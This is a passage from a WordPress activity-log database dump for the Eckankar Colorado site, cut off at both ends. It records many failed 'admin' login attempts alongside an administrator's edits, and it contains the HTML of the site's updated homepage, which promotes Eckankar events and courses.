Chrome/36.0.1985.143 Safari/537.36'),(231844,39241,'_message_key','user_unknown_login_failed'),(231841,39240,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(231842,39241,'failed_username','admin'),(231843,39241,'server_http_user_agent','Mozilla/5.0'),(231839,39240,'_message_key','user_logged_out'),(231840,39240,'_server_remote_addr','76.130.120.x'),(231838,39240,'_user_email','nada@zipnadanot.org'),(231836,39240,'_user_id','2'),(231837,39240,'_user_login','S8zhaBda'),(231834,39239,'_server_remote_addr','76.130.120.x'),(231835,39239,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268958&action=edit'),(231833,39239,'_user_email','nada@zipnadanot.org'),(231831,39239,'_user_id','2'),(231832,39239,'_user_login','S8zhaBda'),(231830,39239,'_message_key','post_updated'),(231829,39239,'post_title','The Power of Grace'),(231827,39239,'post_id','268958'),(231828,39239,'post_type','mec-events'),(231826,39238,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_location&tag_ID=162&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_location%26post_type%3Dmec-events%26paged%3D1'),(231825,39238,'_server_remote_addr','76.130.120.x'),(231820,39238,'to_term_description',''),(231821,39238,'_message_key','edited_term'),(231822,39238,'_user_id','2'),(231823,39238,'_user_login','S8zhaBda'),(231824,39238,'_user_email','nada@zipnadanot.org'),(231818,39238,'to_term_taxonomy','mec_location'),(231819,39238,'to_term_slug','minneapolis-convention-center-1301-second-avenue-south-minneapolis-mn-55403'),(231815,39238,'from_term_slug','minneapolis-convention-center-1301-second-avenue-south-minneapolis-mn-55403'),(231816,39238,'from_term_description',''),(231817,39238,'to_term_name','Minneapolis Convention Center'),(231814,39238,'from_term_taxonomy','mec_location'),(231812,39238,'term_id','162'),(231813,39238,'from_term_name','Minneapolis Convention Center 1301 Second Avenue South, Minneapolis, MN 55403'),(231811,39237,'_server_remote_addr','20.14.80.x'),(231808,39237,'failed_username','admin'),(231809,39237,'server_http_user_agent','Mozilla/5.0'),(231810,39237,'_message_key','user_unknown_login_failed'),(231805,39236,'server_http_user_agent','Mozilla/5.0'),(231806,39236,'_message_key','user_unknown_login_failed'),(231807,39236,'_server_remote_addr','20.14.80.x'),(231804,39236,'failed_username','admin'),(231802,39235,'_server_remote_addr','76.130.120.x'),(231803,39235,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(231801,39235,'_message_key','user_logged_in'),(231797,39235,'_user_id','2'),(231798,39235,'_user_login','S8zhaBda'),(231799,39235,'_user_email','nada@zipnadanot.org'),(231800,39235,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(231796,39235,'user_login','S8zhaBda'),(231795,39235,'user_email','nada@zipnadanot.org'),(231792,39234,'_message_key','user_unknown_login_failed'),(231793,39234,'_server_remote_addr','20.14.80.x'),(231794,39235,'user_id','2'),(231791,39234,'server_http_user_agent','Mozilla/5.0'),(231790,39234,'failed_username','admin'),(231789,39233,'_server_remote_addr','20.14.80.x'),(231786,39233,'failed_username','admin'),(231787,39233,'server_http_user_agent','Mozilla/5.0'),(231788,39233,'_message_key','user_unknown_login_failed'),(231785,39232,'_server_remote_addr','20.14.80.x'),(231784,39232,'_message_key','user_unknown_login_failed'),(231782,39232,'failed_username','admin'),(231783,39232,'server_http_user_agent','Mozilla/5.0'),(231781,39231,'_server_remote_addr','20.14.80.x'),(231780,39231,'_message_key','user_unknown_login_failed'),(231779,39231,'server_http_user_agent','Mozilla/5.0'),(231777,39230,'_server_remote_addr','107.189.7.x'),(231778,39231,'failed_username','admin'),(231776,39230,'_message_key','user_unknown_login_failed'),(231775,39230,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),(231773,39229,'_server_remote_addr','20.14.80.x'),(231774,39230,'failed_username','admin'),(231772,39229,'_message_key','user_unknown_login_failed'),(231756,39225,'_message_key','user_unknown_login_failed'),(231757,39225,'_server_remote_addr','205.185.124.x'),(231758,39226,'failed_username','admin'),(231759,39226,'server_http_user_agent','Mozilla/5.0'),(231760,39226,'_message_key','user_unknown_login_failed'),(231761,39226,'_server_remote_addr','20.14.80.x'),(231762,39227,'failed_username','admin'),(231763,39227,'server_http_user_agent','Mozilla/5.0'),(231764,39227,'_message_key','user_unknown_login_failed'),(231765,39227,'_server_remote_addr','20.14.80.x'),(231766,39228,'failed_username','admin'),(231767,39228,'server_http_user_agent','Mozilla/5.0'),(231768,39228,'_message_key','user_unknown_login_failed'),(231769,39228,'_server_remote_addr','20.14.80.x'),(231770,39229,'failed_username','admin'),(231771,39229,'server_http_user_agent','Mozilla/5.0'),(231755,39225,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),(231754,39225,'failed_username','administrator'),(231753,39224,'_server_remote_addr','20.14.80.x'),(231752,39224,'_message_key','user_unknown_login_failed'),(231751,39224,'server_http_user_agent','Mozilla/5.0'),(231749,39223,'_server_remote_addr','20.14.80.x'),(231750,39224,'failed_username','admin'),(231748,39223,'_message_key','user_unknown_login_failed'),(231747,39223,'server_http_user_agent','Mozilla/5.0'),(231746,39223,'failed_username','admin'),(231745,39222,'_server_remote_addr','104.244.72.x'),(231743,39222,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(231744,39222,'_message_key','user_unknown_login_failed'),(231742,39222,'failed_username','administrator'),(231741,39221,'_server_remote_addr','20.14.80.x'),(231740,39221,'_message_key','user_unknown_login_failed'),(231737,39220,'_server_remote_addr','20.14.80.x'),(231738,39221,'failed_username','admin'),(231739,39221,'server_http_user_agent','Mozilla/5.0'),(231735,39220,'server_http_user_agent','Mozilla/5.0'),(231736,39220,'_message_key','user_unknown_login_failed'),(231734,39220,'failed_username','admin'),(231733,39219,'_server_remote_addr','20.14.80.x'),(231731,39219,'server_http_user_agent','Mozilla/5.0'),(231732,39219,'_message_key','user_unknown_login_failed'),(231730,39219,'failed_username','admin'),(231729,39218,'_server_remote_addr','199.195.250.x'),(231728,39218,'_message_key','user_unknown_login_failed'),(231727,39218,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(231725,39217,'_server_remote_addr','20.14.80.x'),(231726,39218,'failed_username','administrator'),(231724,39217,'_message_key','user_unknown_login_failed'),(231723,39217,'server_http_user_agent','Mozilla/5.0'),(231720,39216,'_message_key','user_unknown_login_failed'),(231721,39216,'_server_remote_addr','20.14.80.x'),(231722,39217,'failed_username','admin'),(231719,39216,'server_http_user_agent','Mozilla/5.0'),(231718,39216,'failed_username','admin'),(231715,39215,'server_http_user_agent','Mozilla/5.0'),(231717,39215,'_server_remote_addr','20.14.80.x'),(231716,39215,'_message_key','user_unknown_login_failed'),(231714,39215,'failed_username','admin'),(231713,39214,'_server_remote_addr','20.14.80.x'),(231711,39214,'server_http_user_agent','Mozilla/5.0'),(231712,39214,'_message_key','user_unknown_login_failed'),(231710,39214,'failed_username','admin'),(231709,39213,'_server_remote_addr','20.14.80.x'),(231708,39213,'_message_key','user_unknown_login_failed'),(231687,39208,'server_http_user_agent','Mozilla/5.0'),(231688,39208,'_message_key','user_unknown_login_failed'),(231689,39208,'_server_remote_addr','20.14.80.x'),(231690,39209,'failed_username','admin'),(231691,39209,'server_http_user_agent','Mozilla/5.0'),(231692,39209,'_message_key','user_unknown_login_failed'),(231693,39209,'_server_remote_addr','20.14.80.x'),(231694,39210,'failed_username','admin'),(231695,39210,'server_http_user_agent','Mozilla/5.0'),(231696,39210,'_message_key','user_unknown_login_failed'),(231697,39210,'_server_remote_addr','20.14.80.x'),(231698,39211,'failed_username','admin'),(231699,39211,'server_http_user_agent','Mozilla/5.0'),(231700,39211,'_message_key','user_unknown_login_failed'),(231701,39211,'_server_remote_addr','20.14.80.x'),(231702,39212,'failed_username','admin'),(231703,39212,'server_http_user_agent','Mozilla/5.0'),(231704,39212,'_message_key','user_unknown_login_failed'),(231705,39212,'_server_remote_addr','20.14.80.x'),(231706,39213,'failed_username','admin'),(231707,39213,'server_http_user_agent','Mozilla/5.0'),(231667,39203,'server_http_user_agent','Mozilla/5.0'),(231668,39203,'_message_key','user_unknown_login_failed'),(231669,39203,'_server_remote_addr','20.14.80.x'),(231670,39204,'failed_username','admin'),(231671,39204,'server_http_user_agent','Mozilla/5.0'),(231672,39204,'_message_key','user_unknown_login_failed'),(231673,39204,'_server_remote_addr','20.14.80.x'),(231674,39205,'failed_username','admin'),(231675,39205,'server_http_user_agent','Mozilla/5.0'),(231676,39205,'_message_key','user_unknown_login_failed'),(231677,39205,'_server_remote_addr','20.14.80.x'),(231678,39206,'failed_username','admin'),(231679,39206,'server_http_user_agent','Mozilla/5.0'),(231680,39206,'_message_key','user_unknown_login_failed'),(231681,39206,'_server_remote_addr','20.14.80.x'),(231682,39207,'failed_username','admin'),(231683,39207,'server_http_user_agent','Mozilla/5.0'),(231684,39207,'_message_key','user_unknown_login_failed'),(231685,39207,'_server_remote_addr','20.14.80.x'),(231686,39208,'failed_username','admin'),(231666,39203,'failed_username','admin'),(231665,39202,'_server_remote_addr','20.14.80.x'),(231664,39202,'_message_key','user_unknown_login_failed'),(231661,39201,'_server_remote_addr','20.14.80.x'),(231662,39202,'failed_username','admin'),(231663,39202,'server_http_user_agent','Mozilla/5.0'),(231657,39200,'_server_remote_addr','20.14.80.x'),(231658,39201,'failed_username','admin'),(231659,39201,'server_http_user_agent','Mozilla/5.0'),(231655,39200,'server_http_user_agent','Mozilla/5.0'),(231660,39201,'_message_key','user_unknown_login_failed'),(231656,39200,'_message_key','user_unknown_login_failed'),(231654,39200,'failed_username','admin'),(231653,39199,'_server_remote_addr','20.14.80.x'),(231650,39199,'failed_username','admin'),(231651,39199,'server_http_user_agent','Mozilla/5.0'),(231652,39199,'_message_key','user_unknown_login_failed'),(231649,39198,'_server_remote_addr','45.61.187.x'),(231648,39198,'_message_key','user_unknown_login_failed'),(231644,39197,'_message_key','user_unknown_login_failed'),(231645,39197,'_server_remote_addr','20.14.80.x'),(231646,39198,'failed_username','admin'),(231647,39198,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),(231643,39197,'server_http_user_agent','Mozilla/5.0'),(231640,39196,'_message_key','user_unknown_login_failed'),(231641,39196,'_server_remote_addr','107.189.4.x'),(231642,39197,'failed_username','admin'),(231637,39195,'_server_remote_addr','20.14.80.x'),(231638,39196,'failed_username','admin'),(231639,39196,'server_http_user_agent','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0'),(231634,39195,'failed_username','admin'),(231635,39195,'server_http_user_agent','Mozilla/5.0'),(231636,39195,'_message_key','user_unknown_login_failed'),(231633,39194,'_server_remote_addr','107.189.4.x'),(231632,39194,'_message_key','user_unknown_login_failed'),(231631,39194,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(231630,39194,'failed_username','administrator'),(231629,39193,'_server_remote_addr','20.14.80.x'),(231628,39193,'_message_key','user_unknown_login_failed'),(231624,39192,'_message_key','user_unknown_login_failed'),(231625,39192,'_server_remote_addr','104.244.74.x'),(231626,39193,'failed_username','admin'),(231627,39193,'server_http_user_agent','Mozilla/5.0'),(231622,39192,'failed_username','administrator'),(231623,39192,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(231618,39191,'failed_username','admin'),(231619,39191,'server_http_user_agent','Mozilla/5.0'),(231620,39191,'_message_key','user_unknown_login_failed'),(231621,39191,'_server_remote_addr','20.14.80.x'),(231616,39190,'_server_remote_addr','76.130.120.x'),(231617,39190,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=aeef56a97e'),(231615,39190,'_message_key','user_logged_out'),(231614,39189,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231613,39189,'_server_remote_addr','76.130.120.x'),(231611,39189,'_user_login','S8zhaBda'),(231612,39189,'_user_email','nada@zipnadanot.org'),(231610,39189,'_user_id','2'),(231609,39189,'_message_key','post_updated'),(231608,39189,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 